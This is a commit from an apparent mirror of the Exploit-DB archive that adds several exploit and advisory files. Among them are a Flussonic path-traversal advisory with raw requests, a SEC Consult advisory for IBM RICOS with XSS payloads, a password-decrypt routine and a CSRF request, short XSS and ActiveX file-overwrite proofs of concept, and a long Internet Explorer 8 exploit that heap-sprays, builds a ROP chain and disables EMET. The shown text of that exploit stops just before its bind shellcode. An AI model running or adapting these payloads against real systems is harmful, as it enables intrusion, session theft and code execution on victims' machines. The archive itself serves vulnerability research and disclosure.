bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_03_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-03 04:38:30 +00:00
parent ff9d2bfa96
commit aa77b5b1c1
7 changed files with 865 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -30564,3 +30564,9 @@ id,file,description,date,author,platform,type,port
33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0
33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0
33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0
33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 'errinfo' Parameter Cross Site Scripting Vulnerability",2010-02-06,"cp77fk4r ",java,webapps,0
33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x URL Processing Cross-site Scripting Vulnerability",2010-05-05,"Alexey Sintsov",multiple,remote,0
33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0
33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0

Can't render this file because it is too large.

133
platforms/aix/dos/33943.txt Executable file
View file

@ -0,0 +1,133 @@
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
Release Date:
===========
June 29, 2014
Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.
Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3
Vulnerability Disclosure Timeline:
=========================
June 26, 2014 : Contact with Vendor
June 26, 2014 : Vendor Response
June 26, 2014 : Version 4.3.4 Deployed
June 29, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
AFR: Remote, Unauthenticated
ADL: Remote, Authenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
Its possible to read any files from the server (with the applications users permissions) by a simple HTTP GET request. Flussonics web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, its possible to login any Flussonic web interface using that method.
2. Arbitrary Directory Listing (Authenticated)
Its possible to list any directories content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;
live mylive;
file vod {
path priv;
}
2. Proof of Concept ADR Request & Response:
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
Solution Fix & Patch:
================
Update version 4.3.4
Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.
Credits & Authors:
==============
Bilgi Güvenliði Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA

9
platforms/java/webapps/33939.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39941/info
ShopEx Single is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ShopEx Single 4.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==

361
platforms/jsp/webapps/33942.txt Executable file
View file

@ -0,0 +1,361 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
=======================================================================
title: Multiple severe vulnerabilities
product: IBM Algorithmics RICOS
vulnerable version: 4.5.0 - 4.7.0
fixed version: 4.7.0.03
CVE number: CVE-2014-0894
CVE-2014-0871
CVE-2014-0870
CVE-2014-0869
CVE-2014-0868
CVE-2014-0867
CVE-2014-0866
CVE-2014-0865
CVE-2014-0864
impact: critical
homepage: http://www-01.ibm.com/software/analytics/algorithmics/
found: 2013-12-19
by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
IBM Algorithmics software enables financial institutions and corporate
treasuries to make risk-aware business decisions. Supported by a global
team of risk experts based in all major financial centers, IBM
Algorithmics solution offerings include market, credit and liquidity risk,
as well as collateral and capital management.
Source: http://www-01.ibm.com/software/analytics/algorithmics/
RICOS is a pre-deal limit management solution part of the Algo Suite.
Business recommendation:
- ------------------------
The identified vulnerabilities affect integrity and confidentiality of the
risk management system. SEC Consult does not recommend to rely on RICOS as
part of risk management until a thorough security review has been performed
by security professionals. As a workaround, access should be limited only to
trusted users internally and sample checks regarding the plausibility of limits
should be performed manually.
Vulnerability overview/description:
- -----------------------------------
1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
The Tomcat configuration discloses technical details within error messages to
the user, which allows an attacker to collect valuable data about the
environment of the solution.
2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
The password and the username of the backend database are disclosed in
clear-text to the user of the web application. This allows attackers to
directly connect to the backend database and manipulate arbitrary data stored
in the database (e.g. limits).
3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
Several parameters in the RICOS web front end and the Blotter are not properly
sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
user sessions and impersonate other users while performing arbitrary actions
on behalf of the victim user.
4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
Weak cryptographic algorithms, being used to store and transfer
user's passwords, allow an attacker to retrieve the plain-text passwords
without further knowledge of cryptographic keys.
5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /
CVSS 3.5)
Several fields of stored data within RICOS are marked as read-only in the web
application, disallowing modification of certain fields. These checks are only
performed client-side, allowing an attacker to alter arbitrary data. An
attacker can create a limit, alter the username of the created limit and
confirm the limit himself, circumventing dual control mechanisms advertised by
RICOS.
6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
cookies for a user that clicks on a manipulated link.
7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
The RICOS fat client submits user credentials in plain-text. An attacker with
access to the network communication can perform man-in-the-middle attacks and
steal user credentials.
This vulnerability also applies to the Blotter, where authentication is
performed unencrypted.
8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
The RICOS fat client performs input validation only client-side. This allows
an attacker to alter arbitrary data. An attacker can create a limit, alter
the username of the created limit and confirm the limit himself, circumventing
dual control mechanisms advertised by RICOS.
9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
The web application does not verify that requests are made only from within
the web application, allowing an attacker to trick users into performing
requests to the web application. This allows an attacker to perform tasks on
behalf of the victim user like modifying limits.
Proof of concept:
- -----------------
1) Information Disclosure
The following URL causes a status 404, disclosing the Tomcat version:
https://ricos/ricos470/classes/
If control characters (i.e. \x00) are sent as part of the cookie, a stack trace
is triggered
2) Password Disclosure
The following request sent by the client during regular communication shows the
database connection settings including the username and the password in
clear-text.
POST /ricos470/Executer HTTP/1.1
Host: ricos
...SNIP...
<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i
n="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t
n="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"
v="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i
n="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i
n="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"
v="password"/>
...SNIP...
3) Non-permanent Cross-Site Scripting
The following URLs demonstrate Cross-Site Scripting vulnerabilities:
POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
Host: ricos
Message=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....
https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x
https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//
http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y
http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>
4) Broken Encryption
The user's password is transported frequently in requests within the application.
The following function decrypts the password without requiring any cryptographic key:
public static void decrypt(String string)
{
int nRadix = 32;
int nR2 = nRadix * nRadix / 2;
GregorianCalendar cal = new GregorianCalendar();
String key = string.substring(0, 2);
int nKey = Integer.parseInt(key, 32);
String encPw = string.substring(2, string.length());
int y = 0;
for (int i = 0; i < encPw.length(); i+=2)
{
String aktuell = encPw.substring(i,i+2);
int new_value = Integer.parseInt(aktuell, 32);
int character = - nKey * (y + 1) % nR2 + new_value;
char decrypt = (char) character;
System.out.print(decrypt);
y = y + 1;
}
}
5) Manipulation of read-only data / dual control mechanism bypass
The following example illustrates how to manipulate a request so that the server
saves it on behalf of another user (only the relevant parts are shown):
<?xml version="1.0" encoding="UTF-8"?>
<ds>
<t n="Service">
<i n="RequestType" v="#Action"/>
<t n="#ActionData">
<i n="#ActionName" v="web.getmeta_udf"/>
<i n="#Mode" v="#Sync"/>
<i n="#Request" v="#Execute"/>
<t n="#OutputData">
<t n="#MapTable">
<i n="#ResultData" v="#ResultData"/>
<i n="#ResultTable" v="#ResultTable"/>
</t>
</t>
<t n="#InputData">
<t n="#WorkTable">
<t n="det_limit">
<i n="SCTYGEID" v="A"/>
[...]
<i n="LMLCURID" v="other_user"/>
<i n="LMEQEPSTDA" v=""/>
[...]
<i n="MFURID" v="other_user"/>
<i n="LMEVFL" v="N"/>
<i n="SOLMFL" v="N"/>
[...]
<i n="CRURID" v="other_user"/>
<i n="MFTS" v=""/>
<i n="MFURID" v="other_user"/>
[...]
<i n="CRURID" v="other_user"/>
<i n="MFTS" v=""/>
[...]
</t>
<t n="Session">
<t n="SessionData">
<i n="LoginUser" v="other_user"/>
<i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>
[...]
<i n="LoginUser v="other_user"/>
<i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>
<i n="URN" v=""/>
<i n="SecServiceURN" v="obsv2:ricos:20100"/>
[...]
</t>
<t n="ObServer">
<i n="UserId" v="other_user"/>
<i n="Password" v=""/>
<i n="Host" v="ricos"/>
[...]
<i n="Prefix" v="RICA"/>
<i n="DbSystem" v="oracle"/>
<i n="LoginUserId" v="other_user"/>
</t>
</t>
</t>
</ds>
6) Cross-Site Cookie Setting
The following URL allows setting of arbitrary cookies:
https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content
7) Plain-text submission of passwords
Neither the fat client nor the Blotter use https to communicate with the
backend server. Both send unencrypted credentials via http during authentication.
8) Client-side Input Validation
By manipulating serialized objects that are transmitted by the fat client,
it is possible to change the user name who created a limit, allowing an attacker
to bypass dual control mechanisms.
9) Cross-Site Request Forgery
The following request, sent on behalf of an authenticated user will e.g.
change the currency of a given deal:
POST http://ricos/ricos470/Executer HTTP/1.1
Host: ricos
<?xml version="1.0" encoding="UTF-8"?>
<ds>
<t n="Service">
<i n="RequestType" v="#Action"/>
<t n="#ActionData">
<i n="#ActionName" v="web.updrec_msp"/>
<i n="#Mode" v="#Sync"/>
<i n="#Request" v="#Execute"/>
<t n="#InputData">
<t n="#MapTable">
<i n="#InputData" v="det_msp"/>
</t>
<t n="#WorkTable">
<t n="det_msp">
<i n="SYPMID" v="SYS-PAR-ID"/>
<i n="CUCD" v="USD"/>
<i n="MIGORILV" v="11"/>
<i n="ILPLMVFL" v="Y"/>
<i n="ILNEMVFL" v="Y"/>
<i n="BSCUONFL" v="N"/>
<i n="PBSCUOFL" v="N"/>
<i n="LORICUTEFL" v="N"/>
<i n="SYSAVAILFL" v="F"/>
<i n="CUSTID" v="CUSTOMER"/>
<i n="CBNALI" v="IS-LOCATED-IN"/>
<i n="CBNAAG" v="AUTOMATIC-GROUP"/>
<i n="UDF1" v="Welcome to ricos 4.71"/>
</t>
...SNIP...
Vulnerable / tested versions:
- -----------------------------
IBM Algorithmics RICOS 4.71
Vendor contact timeline:
- ------------------------
2014-01-24: Contacting vendor through psirt@vnet.ibm.com
2014-01-24: Vendor response, will likely require more than 30 days to resolve issues
asking for acknowledgements
2014-01-24: Sending acknowledgements
2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues
2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
2014-02-10: Providing further information on assumed to be false positive issue 1441
2014-02-14: Telco to clarify vulnerability details and agree on further procedure
patches are scheduled for end of June 2014
2014-02-20: Vendor confirms issue 1441 to be a vulnerability
2014-05-27: Vendor announces that patches will be released on 2014-06-30
2014-06-26: Vendor published patches and security bulletin
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
2014-06-30: SEC Consult publishes the advisory
Solution:
- ---------
Apply patch ACLM 4.7.0.03 FP5. More information:
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
Workaround:
- -----------
Limit access to RICOS and manually perform sample checks regarding the
plausibility of limits.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF F. Lukavsky / @2014
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+
uaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg
uFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F
uQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e
0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl
EEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=
=OFL7
-----END PGP SIGNATURE-----

9
platforms/multiple/remote/33940.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39949/info
VMware View is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects VMware View versions prior to 3.1.3.
http://www.example.com/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>

7
platforms/windows/remote/33941.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39956/info
TVUPlayer ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application, typically Internet Explorer, using the ActiveX control.
TVUPlayer 2.4.9beta1 [build1797] is vulnerable; other versions may be affected.
<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx" prototype = "Property Let LangFileName As String" memberName = "LangFileName" progid = "PlayerOcx.FormPlayer" argCount = 1 arg1="C:\WINDOWS\system32\drivers\etc\hosts" target.LangFileName = arg1 </script></job></package>

340
platforms/windows/remote/33944.html Executable file
View file

@ -0,0 +1,340 @@
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass
** Offensive Security Research Team
** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var getprocaddr = cbuttonlayout + 4836; // GetProcAddress
var getprocaddr = getprocaddr.toString(16);
var getprocaddr1 = getprocaddr.substring(4,8);
var getprocaddr2 = getprocaddr.substring(0,4); // } RET
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u101C%u076d"); // EMET string
shellcode+= unescape("%ue220%u0007"); // EMET offset
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // Zero out ECX
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
// EMET disable part 0x01 end
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02
// Execute the Corbomite bluff to disarm EAF
shellcode+= unescape("%uc0b8%u6d10");
shellcode+= unescape("%u8b07%u8b00");
shellcode+= unescape("%u6800%u10c8");
shellcode+= unescape("%u076d%ud0ff");
shellcode+= unescape("%ud468%u6d10");
shellcode+= unescape("%u5007%uc4b8");
shellcode+= unescape("%u6d10%u8b07");
shellcode+= unescape("%u8b00%uff00");
shellcode+= unescape("%u8bd0%u81f0");
shellcode+= unescape("%uccec%u0002");
shellcode+= unescape("%uc700%u2404");
shellcode+= unescape("%u0010%u0001");
shellcode+= unescape("%ufc8b%uccb9");
shellcode+= unescape("%u0002%u8300");
shellcode+= unescape("%u04c7%ue983");
shellcode+= unescape("%u3304%uf3c0");
shellcode+= unescape("%u54aa%ufe6a");
shellcode+= unescape("%ud6ff%u9090");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u29eb"); // NOPs
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress
shellcode+= "NTDLL";
shellcode+= unescape("%u0000");
shellcode+= unescape("%u744e%u6553"); // NtSetContextThread
shellcode+= unescape("%u4374%u6e6f");
shellcode+= unescape("%u6574%u7478");
shellcode+= unescape("%u6854%u6572");
shellcode+= unescape("%u6461%u0000");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
